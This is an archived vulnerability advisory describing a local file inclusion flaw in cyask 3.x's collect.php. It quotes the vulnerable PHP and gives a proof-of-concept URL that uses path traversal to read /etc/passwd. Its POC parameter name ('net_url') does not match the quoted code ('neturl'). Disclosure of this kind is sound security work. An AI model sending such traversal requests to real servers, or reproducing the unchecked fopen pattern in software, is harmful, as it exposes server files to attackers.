AOH :: HP Unsorted C :: VA1304.HTM

cyask 3.x Local File Inclusion Vulnerability



cyask 3.x Local File Inclusion Vulnerability
cyask 3.x Local File Inclusion Vulnerability



This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.

The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass the user check and then submit any filename to $neturl so that collect.php can read it.

The vuln code like this:
$url=get_referer();
    $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);

    $collect_url=empty($neturl) ? $url : $neturl;

    $contents = '';
    if($fid=@fopen($collect_url,"r"))
    {
        do
        {
            $data = fread($fid, 4096);
            if (strlen($data) == 0)
            {
                break;
            }
            $contents .= $data;
        }
        while(true);
        fclose($fid);
    }

POC:
http://XXX.com/collect.php?net_url=../../../etc/passwd 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.